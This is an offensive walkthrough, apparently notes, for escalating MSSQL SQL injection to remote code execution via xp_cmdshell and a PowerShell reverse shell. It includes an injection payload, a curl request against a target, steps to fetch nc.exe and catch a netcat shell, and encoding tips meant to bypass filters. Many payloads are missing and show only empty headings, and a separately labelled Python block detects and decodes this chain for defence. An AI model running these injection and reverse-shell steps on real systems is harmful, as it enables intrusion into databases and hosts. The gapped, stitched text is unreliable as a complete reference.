Remote Code Execution
Overview
If the SQL login is sa or otherwise a member of the sysadmin role, MSSQL can execute arbitrary operating-system commands through the xp_cmdshell extended stored procedure.
Step 1: Verify Permissions
Check sysadmin Role
IS_SRVROLEMEMBER('sysadmin')
Returns:
1 = Has sysadmin role
0 = Does not have role
SQLi Payload
maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--
Response: taken = the injected condition is true, so the login has the sysadmin role
Using cURL
# URL encode
printf %s "maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--" | jq -rR @uri
# Send request
curl -s "http://<TARGET>/api/check-username.php?u=maria'%20AND%20IS_SRVROLEMEMBER('sysadmin')%3D1%3B--"
Step 2: Enable xp_cmdshell
Enable Advanced Options First
SQLi Payload:
Enable xp_cmdshell
SQLi Payload:
Step 3: Test Command Execution
Ping Test
SQLi Payload:
Verify with tcpdump
Expected Output:
4 ICMP request/reply pairs = xp_cmdshell is working
Step 4: Get Reverse Shell
PowerShell Payload
Encode Payload (Base64 UTF-16LE)
Output: KABuAGUAdwAtAG8AYgBqAGUAYwB0AC...
Final SQLi Payload
Attack Setup
1. Download nc.exe
2. Start HTTP Server
3. Start Netcat Listener
4. Send Payload
5. Receive Shell
Complete Attack Chain
URL Encoding Helper
PowerShell Encoding
Why Encode?
Avoid quotation mark issues
Bypass basic filters
Cleaner payload delivery
Encoding Steps
Write PowerShell command
Convert to UTF-16LE
Base64 encode
Use with the -enc flag
One-liner Template
Alternative: Raikia's Hub
Online encoder (may be offline): https://raikia.com/tool-powershell-encoder/
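As an added defensive example (not code from the original page), a Python helper that reverses the encoding steps above to recover the PowerShell command from a captured -enc blob, and flags the markers of this chain (IS_SRVROLEMEMBER, sp_configure, xp_cmdshell, PowerShell running as the MSSQL service account) in URL-decoded web log lines or process-creation events. The log lines, the ping command and the service-account check are constructed assumptions.

```python
import base64
import re
from typing import Optional
from urllib.parse import unquote

# Indicators taken from the attack chain above: the sysadmin probe, enabling
# xp_cmdshell through sp_configure, and the xp_cmdshell call itself.
MSSQL_RCE_MARKERS = ("is_srvrolemember", "sp_configure", "xp_cmdshell")

# The default xp_cmdshell execution context named on this page.
MSSQL_SERVICE_ACCOUNT = "nt service\\mssqlserver"

# powershell -e / -ec / -enc / -EncodedCommand <base64>; PowerShell accepts any prefix.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse the encoding steps above: base64 -> UTF-16LE bytes -> text.
    Returns None when the blob is not valid base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_line(line: str) -> dict:
    """Inspect one web-access-log line or process-creation log line for this chain."""
    text = unquote(line)  # web logs carry the injected payload URL-encoded
    lowered = text.lower()
    indicators = [m for m in MSSQL_RCE_MARKERS if m in lowered]
    if MSSQL_SERVICE_ACCOUNT in lowered and "powershell" in lowered:
        indicators.append("powershell run as mssql service account")
    decoded = [c for c in (decode_encoded_command(m.group(1)) for m in ENC_RE.finditer(text))
               if c is not None]
    return {"indicators": indicators, "decoded_commands": decoded,
            "suspicious": bool(indicators or decoded)}


# Constructed sample data (not from a real system). The PowerShell command is a
# hypothetical ping test, encoded here exactly as the steps above describe.
SAMPLE_CMD = "ping -n 4 10.10.14.2"
SAMPLE_ENC = base64.b64encode(SAMPLE_CMD.encode("utf-16le")).decode("ascii")
SAMPLE_LINES = [
    "GET /api/check-username.php?u=maria'%20AND%20IS_SRVROLEMEMBER('sysadmin')%3D1%3B-- 200",
    f'User="NT SERVICE\\MSSQLSERVER" Image=powershell.exe CommandLine="powershell -enc {SAMPLE_ENC}"',
    "GET /api/check-username.php?u=maria 200",
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        print(analyse_line(sample))
```

The decoder also works on the truncated blob shown above: its first 32 characters decode to "(new-object".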
xp_cmdshell Reference
Default Execution Context
Commands run as: nt service\mssqlserver
Alternative Shells
Troubleshooting
xp_cmdshell Not Working
Verify sysadmin role
Check if advanced options enabled
Try different xp_cmdshell syntax
Check firewall/network connectivity
Reverse Shell Not Connecting
Verify ports are open
Check if nc.exe downloaded
Try different payload encoding
Use alternative reverse shell methods
Permission Denied
May need different user context
Try proxy account configuration
Escalate privileges first
Quick Reference
Enable xp_cmdshell
Execute Command
Check Permissions